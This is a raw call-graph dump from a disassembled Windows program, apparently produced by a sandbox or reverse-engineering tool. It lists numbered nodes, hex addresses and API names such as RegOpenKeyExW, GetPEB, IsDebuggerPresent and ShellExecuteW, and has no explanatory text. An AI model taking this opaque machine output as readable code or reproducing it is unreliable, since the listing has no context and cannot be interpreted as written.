86996->86982 86997->86982 86999->86992 87000->86987 87001->86987 87003 acd28b 87002->87003 87004 acd2a5 87002->87004 87003->86959 87004->87003 87005 acd2ac RegOpenKeyExW 87004->87005 87005->87003 87006 acd2c6 RegQueryValueExW 87005->87006 87007 acd2fc RegCloseKey 87006->87007 87008 acd2e7 87006->87008 87007->87003 87008->87007 87009 e875a0 87010 e851f0 GetPEB 87009->87010 87011 e87649 87010->87011 87023 e87490 87011->87023 87024 e87499 Sleep 87023->87024 87025 e874a7 87024->87025 87026 b2197b 87031 acdd94 87026->87031 87030 b2198a 87032 acf4ea 48 API calls 87031->87032 87033 acdd9c 87032->87033 87034 acddb0 87033->87034 87039 acdf3d 87033->87039 87038 ad0f0a 52 API calls __cinit 87034->87038 87038->87030 87040 acdf46 87039->87040 87042 acdda8 87039->87042 87071 ad0f0a 52 API calls __cinit 87040->87071 87043 acddc0 87042->87043 87044 abd7f7 48 API calls 87043->87044 87045 acddd7 GetVersionExW 87044->87045 87072 ab6a63 87045->87072 87047 acde1a 87083 acdfb4 87047->87083 87054 b224c8 87055 acdea4 GetCurrentProcess 87100 acdf5f LoadLibraryA GetProcAddress 87055->87100 87057 acdf31 GetSystemInfo 87060 acdf0e 87057->87060 87058 acdee3 87094 ace00c 87058->87094 87059 acdebb 87059->87057 87059->87058 87062 acdf1c FreeLibrary 87060->87062 87063 acdf21 87060->87063 87062->87063 87063->87034 87065 acdf29 GetSystemInfo 87067 acdf03 87065->87067 87066 acdef9 87097 acdff4 87066->87097 87067->87060 87069 acdf09 FreeLibrary 87067->87069 87069->87060 87071->87042 87073 ab6adf 87072->87073 87075 ab6a6f __wsetenvp 87072->87075 87114 abb18b 87073->87114 87076 ab6a8b 87075->87076 87077 ab6ad7 87075->87077 87101 ab6b4a 87076->87101 87113 abc369 48 API calls 87077->87113 87080 ab6a95 87104 acee75 87080->87104 87082 ab6ab6 _memcpy_s 87082->87047 87084 acdfbd 87083->87084 87085 abb18b 48 API calls 87084->87085 87086 acde22 87085->87086 87087 ab6571 87086->87087 87088 ab657f 87087->87088 87089 abb18b 48 API calls 87088->87089 87090 ab658f 87089->87090 87090->87054 87091 acdf77 87090->87091 87126 acdf89 87091->87126 87130 ace01e 87094->87130 87098 ace00c 2 API calls 87097->87098 87099 acdf01 GetNativeSystemInfo 87098->87099 87099->87067 87100->87059 87102 acf4ea 48 API calls 87101->87102 87103 ab6b54 87102->87103 87103->87080 87106 acf4ea __calloc_impl 87104->87106 87105 ad395c __crtGetStringTypeA_stat 47 API calls 87105->87106 87106->87105 87107 acf50c 87106->87107 87108 acf50e std::exception::exception 87106->87108 87107->87082 87118 ad6805 RaiseException 87108->87118 87110 acf538 87119 ad673b 47 API calls _free 87110->87119 87112 acf54a 87112->87082 87113->87082 87115 abb199 87114->87115 87117 abb1a2 _memcpy_s 87114->87117 87115->87117 87120 abbdfa 87115->87120 87117->87082 87118->87110 87119->87112 87121 abbe0a _memcpy_s 87120->87121 87122 abbe0d 87120->87122 87121->87117 87123 acf4ea 48 API calls 87122->87123 87124 abbe17 87123->87124 87125 acee75 48 API calls 87124->87125 87125->87121 87127 acdea0 87126->87127 87128 acdf92 LoadLibraryA 87126->87128 87127->87055 87127->87059 87128->87127 87129 acdfa3 GetProcAddress 87128->87129 87129->87127 87131 acdef1 87130->87131 87132 ace027 LoadLibraryA 87130->87132 87131->87065 87131->87066 87132->87131 87133 ace038 GetProcAddress 87132->87133 87133->87131 87134 ab3742 87135 ab374b 87134->87135 87136 ab3769 87135->87136 87137 ab37c8 87135->87137 87175 ab37c6 87135->87175 87141 ab382c PostQuitMessage 87136->87141 87142 ab3776 87136->87142 87139 b21e00 87137->87139 87140 ab37ce 87137->87140 87138 ab37ab DefWindowProcW 87168 ab37b9 87138->87168 87189 ab2ff6 16 API calls 87139->87189 87143 ab37d3 87140->87143 87144 ab37f6 SetTimer RegisterWindowMessageW 87140->87144 87141->87168 87146 b21e88 87142->87146 87147 ab3781 87142->87147 87148 b21da3 87143->87148 87149 ab37da KillTimer 87143->87149 87151 ab381f CreatePopupMenu 87144->87151 87144->87168 87204 af4ddd 60 API calls _memset 87146->87204 87152 ab3789 87147->87152 87153 ab3836 87147->87153 87155 b21da8 87148->87155 87156 b21ddc MoveWindow 87148->87156 87186 ab3847 Shell_NotifyIconW _memset 87149->87186 87150 b21e27 87190 ace312 332 API calls Mailbox 87150->87190 87151->87168 87159 b21e6d 87152->87159 87160 ab3794 87152->87160 87179 aceb83 87153->87179 87163 b21dcb SetFocus 87155->87163 87164 b21dac 87155->87164 87156->87168 87159->87138 87203 aea5f3 48 API calls 87159->87203 87166 ab379f 87160->87166 87167 b21e58 87160->87167 87161 b21e9a 87161->87138 87161->87168 87163->87168 87164->87166 87169 b21db5 87164->87169 87165 ab37ed 87187 ab390f DeleteObject DestroyWindow Mailbox 87165->87187 87166->87138 87191 ab3847 Shell_NotifyIconW _memset 87166->87191 87202 af55bd 70 API calls _memset 87167->87202 87188 ab2ff6 16 API calls 87169->87188 87174 b21e68 87174->87168 87175->87138 87177 b21e4c 87192 ab4ffc 87177->87192 87180 acec1c 87179->87180 87181 aceb9a _memset 87179->87181 87180->87168 87205 ab51af 87181->87205 87183 acebc1 87184 acec05 KillTimer SetTimer 87183->87184 87185 b23c7a Shell_NotifyIconW 87183->87185 87184->87180 87185->87184 87186->87165 87187->87168 87188->87168 87189->87150 87190->87166 87191->87177 87193 ab5027 _memset 87192->87193 87284 ab4c30 87193->87284 87196 ab50ac 87198 ab50ca Shell_NotifyIconW 87196->87198 87199 b23d28 Shell_NotifyIconW 87196->87199 87200 ab51af 50 API calls 87198->87200 87201 ab50df 87200->87201 87201->87175 87202->87174 87203->87175 87204->87161 87206 ab51cb 87205->87206 87207 ab52a2 Mailbox 87205->87207 87227 ab6b0f 87206->87227 87207->87183 87210 b23ca1 LoadStringW 87214 b23cbb 87210->87214 87211 ab51e6 87212 ab6a63 48 API calls 87211->87212 87213 ab51fb 87212->87213 87213->87214 87215 ab520c 87213->87215 87216 ab510d 48 API calls 87214->87216 87217 ab52a7 87215->87217 87218 ab5216 87215->87218 87221 b23cc5 87216->87221 87241 ab6eed 87217->87241 87232 ab510d 87218->87232 87224 ab5220 _memset _wcscpy 87221->87224 87245 ab518c 87221->87245 87223 b23ce7 87226 ab518c 48 API calls 87223->87226 87225 ab5288 Shell_NotifyIconW 87224->87225 87225->87207 87226->87224 87228 acf4ea 48 API calls 87227->87228 87229 ab6b34 87228->87229 87230 ab6b4a 48 API calls 87229->87230 87231 ab51d9 87230->87231 87231->87210 87231->87211 87233 ab511f 87232->87233 87234 b21be7 87232->87234 87255 abb384 87233->87255 87264 aea58f 48 API calls _memcpy_s 87234->87264 87237 ab512b 87237->87224 87238 b21bf1 87239 ab6eed 48 API calls 87238->87239 87240 b21bf9 Mailbox 87239->87240 87242 ab6ef8 87241->87242 87243 ab6f00 87241->87243 87270 abdd47 87242->87270 87243->87224 87246 ab5197 87245->87246 87247 ab519f 87246->87247 87248 b21ace 87246->87248 87274 ab5130 87247->87274 87250 ab6b4a 48 API calls 87248->87250 87252 b21adb __wsetenvp 87250->87252 87251 ab51aa 87251->87223 87253 acee75 48 API calls 87252->87253 87254 b21b07 _memcpy_s 87253->87254 87256 abb392 87255->87256 87257 abb3c5 _memcpy_s 87255->87257 87256->87257 87258 abb3b8 87256->87258 87259 abb3fd 87256->87259 87257->87237 87257->87257 87265 abbb85 87258->87265 87261 acf4ea 48 API calls 87259->87261 87262 abb407 87261->87262 87263 acf4ea 48 API calls 87262->87263 87263->87257 87264->87238 87266 abbb9b 87265->87266 87268 abbb96 _memcpy_s 87265->87268 87267 acee75 48 API calls 87266->87267 87269 b21b77 87266->87269 87267->87268 87268->87257 87269->87269 87271 abdd6a _memcpy_s 87270->87271 87272 abdd57 87270->87272 87271->87243 87272->87271 87273 acf4ea 48 API calls 87272->87273 87273->87271 87275 ab513f __wsetenvp 87274->87275 87276 b21b27 87275->87276 87277 ab5151 87275->87277 87279 ab6b4a 48 API calls 87276->87279 87278 abbb85 48 API calls 87277->87278 87280 ab515e _memcpy_s 87278->87280 87281 b21b34 87279->87281 87280->87251 87282 acee75 48 API calls 87281->87282 87283 b21b57 _memcpy_s 87282->87283 87285 b23c33 87284->87285 87286 ab4c44 87284->87286 87285->87286 87287 b23c3c DestroyIcon 87285->87287 87286->87196 87288 af5819 61 API calls _W_store_winword 87286->87288 87287->87286 87288->87196 87289 b28eb8 87293 afa635 87289->87293 87291 b28ec3 87292 afa635 85 API calls 87291->87292 87292->87291 87294 afa66f 87293->87294 87299 afa642 87293->87299 87294->87291 87295 afa671 87325 acec4e 82 API calls 87295->87325 87297 afa676 87304 ab936c 87297->87304 87299->87294 87299->87295 87299->87297 87302 afa669 87299->87302 87300 afa67d 87301 ab510d 48 API calls 87300->87301 87301->87294 87324 ac4525 61 API calls _memcpy_s 87302->87324 87305 ab9384 87304->87305 87319 ab9380 87304->87319 87306 b24cbd __i64tow 87305->87306 87307 ab9398 87305->87307 87308 b24bbf 87305->87308 87309 ab93b0 __itow Mailbox _wcscpy 87305->87309 87326 ad172b 81 API calls 4 library calls 87307->87326 87310 b24ca5 87308->87310 87311 b24bc8 87308->87311 87314 acf4ea 48 API calls 87309->87314 87333 ad172b 81 API calls 4 library calls 87310->87333 87311->87309 87316 b24be7 87311->87316 87315 ab93ba 87314->87315 87315->87319 87327 abce19 87315->87327 87317 acf4ea 48 API calls 87316->87317 87320 b24c04 87317->87320 87319->87300 87321 acf4ea 48 API calls 87320->87321 87322 b24c2a 87321->87322 87322->87319 87323 abce19 48 API calls 87322->87323 87323->87319 87324->87294 87325->87297 87326->87309 87328 abce28 __wsetenvp 87327->87328 87329 acee75 48 API calls 87328->87329 87330 abce50 _memcpy_s 87329->87330 87331 acf4ea 48 API calls 87330->87331 87332 abce66 87331->87332 87332->87319 87333->87309 87334 abef80 87337 ac3b70 87334->87337 87336 abef8c 87338 ac3bc8 87337->87338 87390 ac42a5 87337->87390 87339 ac3bef 87338->87339 87341 b26fd1 87338->87341 87344 b26f7e 87338->87344 87350 b26f9b 87338->87350 87340 acf4ea 48 API calls 87339->87340 87342 ac3c18 87340->87342 87430 b0ceca 332 API calls Mailbox 87341->87430 87345 acf4ea 48 API calls 87342->87345 87344->87339 87346 b26f87 87344->87346 87397 ac3c2c _memcpy_s __wsetenvp 87345->87397 87427 b0d552 332 API calls Mailbox 87346->87427 87347 b26fbe 87429 afcc5c 87 API calls 4 library calls 87347->87429 87350->87347 87428 b0da0e 332 API calls 2 library calls 87350->87428 87352 ac42f2 87449 afcc5c 87 API calls 4 library calls 87352->87449 87354 b273b0 87354->87336 87355 b27297 87438 afcc5c 87 API calls 4 library calls 87355->87438 87356 b2737a 87448 afcc5c 87 API calls 4 library calls 87356->87448 87361 ac40df 87439 afcc5c 87 API calls 4 library calls 87361->87439 87363 b2707e 87431 afcc5c 87 API calls 4 library calls 87363->87431 87367 acdce0 53 API calls 87367->87397 87369 abd645 53 API calls 87369->87397 87371 b272d2 87440 afcc5c 87 API calls 4 library calls 87371->87440 87373 b27350 87446 afcc5c 87 API calls 4 library calls 87373->87446 87375 abfe30 332 API calls 87375->87397 87376 b27363 87447 afcc5c 87 API calls 4 library calls 87376->87447 87378 b272e9 87441 afcc5c 87 API calls 4 library calls 87378->87441 87381 ab6a63 48 API calls 87381->87397 87383 b2714c 87435 b0ccdc 48 API calls 87383->87435 87384 abd286 48 API calls 87384->87397 87387 b2733f 87445 afcc5c 87 API calls 4 library calls 87387->87445 87388 ac3f2b 87388->87336 87442 afcc5c 87 API calls 4 library calls 87390->87442 87391 b271a1 87437 acc15c 48 API calls 87391->87437 87394 acee75 48 API calls 87394->87397 87395 ab6eed 48 API calls 87395->87397 87397->87352 87397->87355 87397->87356 87397->87361 87397->87363 87397->87367 87397->87369 87397->87371 87397->87373 87397->87375 87397->87376 87397->87378 87397->87381 87397->87383 87397->87384 87397->87387 87397->87388 87397->87390 87397->87394 87397->87395 87398 b271e1 87397->87398 87405 acf4ea 48 API calls 87397->87405 87408 abd9a0 53 API calls __cinit 87397->87408 87409 abd83d 53 API calls 87397->87409 87410 abcdb9 48 API calls 87397->87410 87411 abd6e9 87397->87411 87415 acc15c 48 API calls 87397->87415 87416 acc050 87397->87416 87432 abdcae 50 API calls Mailbox 87397->87432 87433 b0ccdc 48 API calls 87397->87433 87434 afa1eb 50 API calls 87397->87434 87398->87388 87444 afcc5c 87 API calls 4 library calls 87398->87444 87399 b2715f 87399->87391 87436 b0ccdc 48 API calls 87399->87436 87401 b271ce 87402 acc050 48 API calls 87401->87402 87404 b271d6 87402->87404 87403 b271ab 87403->87390 87403->87401 87404->87398 87406 b27313 87404->87406 87405->87397 87443 afcc5c 87 API calls 4 library calls 87406->87443 87408->87397 87409->87397 87410->87397 87413 abd6f4 87411->87413 87412 abd71b 87412->87397 87413->87412 87450 abd764 55 API calls 87413->87450 87415->87397 87417 acc064 87416->87417 87419 acc069 Mailbox 87416->87419 87451 acc1af 48 API calls 87417->87451 87424 acc077 87419->87424 87452 acc15c 48 API calls 87419->87452 87421 acf4ea 48 API calls 87423 acc108 87421->87423 87422 acc152 87422->87397 87425 acf4ea 48 API calls 87423->87425 87424->87421 87424->87422 87426 acc113 87425->87426 87426->87397 87426->87426 87427->87388 87428->87347 87429->87341 87430->87397 87431->87388 87432->87397 87433->87397 87434->87397 87435->87399 87436->87399 87437->87403 87438->87361 87439->87388 87440->87378 87441->87388 87442->87388 87443->87388 87444->87388 87445->87388 87446->87388 87447->87388 87448->87388 87449->87354 87450->87412 87451->87419 87452->87424 87453 b219dd 87458 ab4a30 87453->87458 87455 b219f1 87478 ad0f0a 52 API calls __cinit 87455->87478 87457 b219fb 87459 ab4a40 __ftell_nolock 87458->87459 87460 abd7f7 48 API calls 87459->87460 87461 ab4af6 87460->87461 87479 ab5374 87461->87479 87463 ab4aff 87486 ab363c 87463->87486 87466 ab518c 48 API calls 87467 ab4b18 87466->87467 87492 ab64cf 87467->87492 87470 abd7f7 48 API calls 87471 ab4b32 87470->87471 87498 ab49fb 87471->87498 87473 ab4b43 Mailbox 87473->87455 87474 abce19 48 API calls 87476 ab4b3d _wcscat Mailbox __wsetenvp 87474->87476 87475 ab64cf 48 API calls 87475->87476 87476->87473 87476->87474 87476->87475 87477 ab61a6 48 API calls 87476->87477 87477->87476 87478->87457 87512 adf8a0 87479->87512 87482 abce19 48 API calls 87483 ab53a7 87482->87483 87514 ab660f 87483->87514 87485 ab53b1 Mailbox 87485->87463 87487 ab3649 __ftell_nolock 87486->87487 87521 ab366c GetFullPathNameW 87487->87521 87489 ab365a 87490 ab6a63 48 API calls 87489->87490 87491 ab3669 87490->87491 87491->87466 87493 ab651b 87492->87493 87497 ab64dd _memcpy_s 87492->87497 87496 acf4ea 48 API calls 87493->87496 87494 acf4ea 48 API calls 87495 ab4b29 87494->87495 87495->87470 87496->87497 87497->87494 87523 abbcce 87498->87523 87501 ab4a2b 87501->87476 87502 b241cc RegQueryValueExW 87503 b24246 RegCloseKey 87502->87503 87504 b241e5 87502->87504 87505 acf4ea 48 API calls 87504->87505 87506 b241fe 87505->87506 87529 ab47b7 87506->87529 87509 b24224 87511 ab6a63 48 API calls 87509->87511 87510 b2423b 87510->87503 87511->87510 87513 ab5381 GetModuleFileNameW 87512->87513 87513->87482 87515 adf8a0 __ftell_nolock 87514->87515 87516 ab661c GetFullPathNameW 87515->87516 87517 ab6a63 48 API calls 87516->87517 87518 ab6643 87517->87518 87519 ab6571 48 API calls 87518->87519 87520 ab664f 87519->87520 87520->87485 87522 ab368a 87521->87522 87522->87489 87524 abbce8 87523->87524 87528 ab4a0a RegOpenKeyExW 87523->87528 87525 acf4ea 48 API calls 87524->87525 87526 abbcf2 87525->87526 87527 acee75 48 API calls 87526->87527 87527->87528 87528->87501 87528->87502 87530 acf4ea 48 API calls 87529->87530 87531 ab47c9 RegQueryValueExW 87530->87531 87531->87509 87531->87510 87532 ad5dfd 87533 ad5e09 _fseek 87532->87533 87569 ad7eeb GetStartupInfoW 87533->87569 87535 ad5e0e 87571 ad9ca7 GetProcessHeap 87535->87571 87537 ad5e66 87538 ad5e71 87537->87538 87656 ad5f4d 47 API calls 3 library calls 87537->87656 87572 ad7b47 87538->87572 87541 ad5e77 87543 ad5e82 __RTC_Initialize 87541->87543 87657 ad5f4d 47 API calls 3 library calls 87541->87657 87593 adacb3 87543->87593 87545 ad5e91 87546 ad5e9d GetCommandLineW 87545->87546 87658 ad5f4d 47 API calls 3 library calls 87545->87658 87612 ae2e7d GetEnvironmentStringsW 87546->87612 87550 ad5e9c 87550->87546 87553 ad5ec2 87625 ae2cb4 87553->87625 87556 ad5ec8 87557 ad5ed3 87556->87557 87660 ad115b 47 API calls 3 library calls 87556->87660 87639 ad1195 87557->87639 87560 ad5edb 87561 ad5ee6 __wwincmdln 87560->87561 87661 ad115b 47 API calls 3 library calls 87560->87661 87643 ab3a0f 87561->87643 87564 ad5efa 87565 ad5f09 87564->87565 87662 ad13f1 47 API calls _doexit 87564->87662 87663 ad1186 47 API calls _doexit 87565->87663 87568 ad5f0e _fseek 87570 ad7f01 87569->87570 87570->87535 87571->87537 87664 ad123a 30 API calls 2 library calls 87572->87664 87574 ad7b4c 87665 ad7e23 InitializeCriticalSectionAndSpinCount 87574->87665 87576 ad7b51 87577 ad7b55 87576->87577 87667 ad7e6d TlsAlloc 87576->87667 87666 ad7bbd 50 API calls 2 library calls 87577->87666 87580 ad7b67 87580->87577 87582 ad7b72 87580->87582 87581 ad7b5a 87581->87541 87668 ad6986 87582->87668 87585 ad7bb4 87676 ad7bbd 50 API calls 2 library calls 87585->87676 87588 ad7b93 87588->87585 87590 ad7b99 87588->87590 87589 ad7bb9 87589->87541 87675 ad7a94 47 API calls 4 library calls 87590->87675 87592 ad7ba1 GetCurrentThreadId 87592->87541 87594 adacbf _fseek 87593->87594 87685 ad7cf4 87594->87685 87596 adacc6 87597 ad6986 __calloc_crt 47 API calls 87596->87597 87598 adacd7 87597->87598 87599 adad42 GetStartupInfoW 87598->87599 87600 adace2 _fseek @_EH4_CallFilterFunc@8 87598->87600 87603 adae80 87599->87603 87605 adad57 87599->87605 87600->87545 87601 adaf44 87692 adaf58 LeaveCriticalSection _doexit 87601->87692 87603->87601 87606 adaec9 GetStdHandle 87603->87606 87608 adaedb GetFileType 87603->87608 87609 adaf08 InitializeCriticalSectionAndSpinCount 87603->87609 87604 adada5 87604->87603 87610 adade5 InitializeCriticalSectionAndSpinCount 87604->87610 87611 adadd7 GetFileType 87604->87611 87605->87603 87605->87604 87607 ad6986 __calloc_crt 47 API calls 87605->87607 87606->87603 87607->87605 87608->87603 87609->87603 87610->87604 87611->87604 87611->87610 87613 ae2e8e 87612->87613 87614 ad5ead 87612->87614 87731 ad69d0 47 API calls __crtGetStringTypeA_stat 87613->87731 87619 ae2a7b GetModuleFileNameW 87614->87619 87617 ae2eca FreeEnvironmentStringsW 87617->87614 87618 ae2eb4 _memcpy_s 87618->87617 87620 ae2aaf _wparse_cmdline 87619->87620 87621 ad5eb7 87620->87621 87622 ae2ae9 87620->87622 87621->87553 87659 ad115b 47 API calls 3 library calls 87621->87659 87732 ad69d0 47 API calls __crtGetStringTypeA_stat 87622->87732 87624 ae2aef _wparse_cmdline 87624->87621 87626 ae2ccd __wsetenvp 87625->87626 87630 ae2cc5 87625->87630 87627 ad6986 __calloc_crt 47 API calls 87626->87627 87635 ae2cf6 __wsetenvp 87627->87635 87628 ae2d4d 87629 ad1c9d _free 47 API calls 87628->87629 87629->87630 87630->87556 87631 ad6986 __calloc_crt 47 API calls 87631->87635 87632 ae2d72 87634 ad1c9d _free 47 API calls 87632->87634 87634->87630 87635->87628 87635->87630 87635->87631 87635->87632 87636 ae2d89 87635->87636 87733 ae2567 47 API calls 2 library calls 87635->87733 87734 ad6e20 IsProcessorFeaturePresent 87636->87734 87638 ae2d95 87638->87556 87640 ad11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 87639->87640 87642 ad11e0 __IsNonwritableInCurrentImage 87640->87642 87757 ad0f0a 52 API calls __cinit 87640->87757 87642->87560 87644 ab3a29 87643->87644 87645 b21ebf 87643->87645 87646 ab3a63 IsThemeActive 87644->87646 87758 ad1405 87646->87758 87650 ab3a8f 87770 ab3adb SystemParametersInfoW SystemParametersInfoW 87650->87770 87652 ab3a9b 87771 ab3d19 87652->87771 87654 ab3aa3 SystemParametersInfoW 87655 ab3ac8 87654->87655 87655->87564 87656->87538 87657->87543 87658->87550 87662->87565 87663->87568 87664->87574 87665->87576 87666->87581 87667->87580 87671 ad698d 87668->87671 87670 ad69ca 87670->87585 87674 ad7ec9 TlsSetValue 87670->87674 87671->87670 87672 ad69ab Sleep 87671->87672 87677 ae30aa 87671->87677 87673 ad69c2 87672->87673 87673->87670 87673->87671 87674->87588 87675->87592 87676->87589 87678 ae30b5 87677->87678 87683 ae30d0 __calloc_impl 87677->87683 87679 ae30c1 87678->87679 87678->87683 87684 ad7c0e 47 API calls __getptd_noexit 87679->87684 87681 ae30e0 RtlAllocateHeap 87682 ae30c6 87681->87682 87681->87683 87682->87671 87683->87681 87683->87682 87684->87682 87686 ad7d18 EnterCriticalSection 87685->87686 87687 ad7d05 87685->87687 87686->87596 87693 ad7d7c 87687->87693 87689 ad7d0b 87689->87686 87717 ad115b 47 API calls 3 library calls 87689->87717 87692->87600 87694 ad7d88 _fseek 87693->87694 87695 ad7da9 87694->87695 87696 ad7d91 87694->87696 87698 ad7da7 87695->87698 87704 ad7e11 _fseek 87695->87704 87718 ad81c2 47 API calls 2 library calls 87696->87718 87698->87695 87721 ad69d0 47 API calls __crtGetStringTypeA_stat 87698->87721 87699 ad7d96 87719 ad821f 47 API calls 8 library calls 87699->87719 87702 ad7dbd 87705 ad7dc4 87702->87705 87706 ad7dd3 87702->87706 87703 ad7d9d 87720 ad1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 87703->87720 87704->87689 87722 ad7c0e 47 API calls __getptd_noexit 87705->87722 87708 ad7cf4 __lock 46 API calls 87706->87708 87711 ad7dda 87708->87711 87710 ad7dc9 87710->87704 87712 ad7dfe 87711->87712 87713 ad7de9 InitializeCriticalSectionAndSpinCount 87711->87713 87723 ad1c9d 87712->87723 87714 ad7e04 87713->87714 87729 ad7e1a LeaveCriticalSection _doexit 87714->87729 87718->87699 87719->87703 87721->87702 87722->87710 87724 ad1ca6 RtlFreeHeap 87723->87724 87725 ad1ccf _free 87723->87725 87724->87725 87726 ad1cbb 87724->87726 87725->87714 87730 ad7c0e 47 API calls __getptd_noexit 87726->87730 87728 ad1cc1 GetLastError 87728->87725 87729->87704 87730->87728 87731->87618 87732->87624 87733->87635 87735 ad6e2b 87734->87735 87740 ad6cb5 87735->87740 87739 ad6e46 87739->87638 87741 ad6ccf _memset ___raise_securityfailure 87740->87741 87742 ad6cef IsDebuggerPresent 87741->87742 87748 ad81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 87742->87748 87745 ad6db3 ___raise_securityfailure 87749 ada70c 87745->87749 87746 ad6dd6 87747 ad8197 GetCurrentProcess TerminateProcess 87746->87747 87747->87739 87748->87745 87750 ada714 87749->87750 87751 ada716 IsProcessorFeaturePresent 87749->87751 87750->87746 87753 ae37b0 87751->87753 87756 ae375f 5 API calls ___raise_securityfailure 87753->87756 87755 ae3893 87755->87746 87756->87755 87757->87642 87759 ad7cf4 __lock 47 API calls 87758->87759 87760 ad1410 87759->87760 87823 ad7e58 LeaveCriticalSection 87760->87823 87762 ab3a88 87763 ad146d 87762->87763 87764 ad1477 87763->87764 87765 ad1491 87763->87765 87764->87765 87824 ad7c0e 47 API calls __getptd_noexit 87764->87824 87765->87650 87767 ad1481 87825 ad6e10 8 API calls ___strgtold12_l 87767->87825 87769 ad148c 87769->87650 87770->87652 87772 ab3d26 __ftell_nolock 87771->87772 87773 abd7f7 48 API calls 87772->87773 87774 ab3d31 GetCurrentDirectoryW 87773->87774 87826 ab61ca 87774->87826 87776 ab3d57 IsDebuggerPresent 87777 b21cc1 MessageBoxA 87776->87777 87778 ab3d65 87776->87778 87780 b21cd9 87777->87780 87778->87780 87781 ab3d82 87778->87781 87810 ab3e3a 87778->87810 87779 ab3e41 SetCurrentDirectoryW 87784 ab3e4e Mailbox 87779->87784 88002 acc682 48 API calls 87780->88002 87900 ab40e5 87781->87900 87784->87654 87785 b21ce9 87790 b21cff SetCurrentDirectoryW 87785->87790 87787 ab3da0 GetFullPathNameW 87788 ab6a63 48 API calls 87787->87788 87789 ab3ddb 87788->87789 87916 ab6430 87789->87916 87790->87784 87793 ab3df6 87794 ab3e00 87793->87794 88003 af71fa AllocateAndInitializeSid CheckTokenMembership FreeSid 87793->88003 87932 ab3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 87794->87932 87798 b21d1c 87798->87794 87801 b21d2d 87798->87801 87800 ab3e0a 87803 ab3e1f 87800->87803 87805 ab4ffc 67 API calls 87800->87805 87802 ab5374 50 API calls 87801->87802 87804 b21d35 87802->87804 87940 abe8d0 87803->87940 87807 abce19 48 API calls 87804->87807 87805->87803 87809 b21d42 87807->87809 87811 b21d49 87809->87811 87812 b21d6e 87809->87812 87810->87779 87814 ab518c 48 API calls 87811->87814 87815 ab518c 48 API calls 87812->87815 87816 b21d54 87814->87816 87817 b21d6a GetForegroundWindow ShellExecuteW 87815->87817 87818 ab510d 48 API calls 87816->87818 87821 b21d9e Mailbox 87817->87821 87820 b21d61 87818->87820 87822 ab518c 48 API calls 87820->87822 87821->87810 87822->87817 87823->87762 87824->87767 87825->87769 88004 ace99b 87826->88004 87830 ab61eb 87831 ab5374 50 API calls 87830->87831 87832 ab61ff 87831->87832 87833 abce19 48 API calls 87832->87833 87834 ab620c 87833->87834 88021 ab39db 87834->88021 87836 ab6216 Mailbox 87837 ab6eed 48 API calls 87836->87837 87838 ab622b 87837->87838 88033 ab9048 87838->88033 87841 abce19 48 API calls 87842 ab6244 87841->87842 87843 abd6e9 55 API calls 87842->87843 87844 ab6254 Mailbox 87843->87844 87845 abce19 48 API calls 87844->87845 87846 ab627c 87845->87846 87847 abd6e9 55 API calls 87846->87847 87848 ab628f Mailbox 87847->87848 87849 abce19 48 API calls 87848->87849 87850 ab62a0 87849->87850 88036 abd645 87850->88036 87852 ab62b2 Mailbox 87853 abd7f7 48 API calls 87852->87853 87854 ab62c5 87853->87854 88046 ab63fc 87854->88046 87858 ab62df 87859 ab62e9 87858->87859 87860 b21c08 87858->87860 87861 ad0fa7 _W_store_winword 59 API calls 87859->87861 87862 ab63fc 48 API calls 87860->87862 87864 ab62f4 87861->87864 87863 b21c1c 87862->87863 87866 ab63fc 48 API calls 87863->87866 87864->87863 87865 ab62fe 87864->87865 87867 ad0fa7 _W_store_winword 59 API calls 87865->87867 87868 b21c38 87866->87868 87869 ab6309 87867->87869 87871 ab5374 50 API calls 87868->87871 87869->87868 87870 ab6313 87869->87870 87872 ad0fa7 _W_store_winword 59 API calls 87870->87872 87873 b21c5d 87871->87873 87874 ab631e 87872->87874 87875 ab63fc 48 API calls 87873->87875 87876 ab635f 87874->87876 87877 b21c86 87874->87877 87880 ab63fc 48 API calls 87874->87880 87879 b21c69 87875->87879 87876->87877 87878 ab636c 87876->87878 87881 ab6eed 48 API calls 87877->87881 87885 acc050 48 API calls 87878->87885 87882 ab6eed 48 API calls 87879->87882 87883 ab6342 87880->87883 87884 b21ca8 87881->87884 87886 b21c77 87882->87886 87887 ab6eed 48 API calls 87883->87887 87888 ab63fc 48 API calls 87884->87888 87889 ab6384 87885->87889 87890 ab63fc 48 API calls 87886->87890 87891 ab6350 87887->87891 87892 b21cb5 87888->87892 88062 ac1b90 87889->88062 87890->87877 87894 ab63fc 48 API calls 87891->87894 87892->87892 87894->87876 87895 ab6394 87896 ac1b90 48 API calls 87895->87896 87898 ab63fc 48 API calls 87895->87898 87899 ab63d6 Mailbox 87895->87899 88078 ab6b68 48 API calls 87895->88078 87896->87895 87898->87895 87899->87776 87901 ab40f2 __ftell_nolock 87900->87901 87902 ab410b 87901->87902 87903 b2370e _memset 87901->87903 87904 ab660f 49 API calls 87902->87904 87905 b2372a GetOpenFileNameW 87903->87905 87906 ab4114 87904->87906 87908 b23779 87905->87908 88557 ab40a7 87906->88557 87910 ab6a63 48 API calls 87908->87910 87912 b2378e 87910->87912 87912->87912 87913 ab4129 88575 ab4139 87913->88575 87917 ab643d __ftell_nolock 87916->87917 88775 ab4c75 87917->88775 87919 ab6442 87920 ab3dee 87919->87920 88786 ab5928 87 API calls 87919->88786 87920->87785 87920->87793 87922 ab644f 87922->87920 88787 ab5798 89 API calls Mailbox 87922->88787 87924 ab6458 87924->87920 87925 ab645c GetFullPathNameW 87924->87925 87926 ab6a63 48 API calls 87925->87926 87927 ab6488 87926->87927 87928 ab6a63 48 API calls 87927->87928 87929 ab6495 87928->87929 87930 b25dcf _wcscat 87929->87930 87931 ab6a63 48 API calls 87929->87931 87931->87920 87933 ab3ed8 87932->87933 87934 b21cba 87932->87934 88835 ab4024 87933->88835 87938 ab3e05 87939 ab36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 87938->87939 87939->87800 87941 abe8f6 87940->87941 88000 abe906 Mailbox 87940->88000 87943 abed52 87941->87943 87941->88000 87942 afcc5c 87 API calls 87942->88000 88966 ace3cd 332 API calls 87943->88966 87945 ab3e2a 87945->87810 88001 ab3847 Shell_NotifyIconW _memset 87945->88001 87947 abed63 87947->87945 87948 abed70 87947->87948 88968 ace312 332 API calls Mailbox 87948->88968 87949 abe94c PeekMessageW 87949->88000 87951 b2526e Sleep 87951->88000 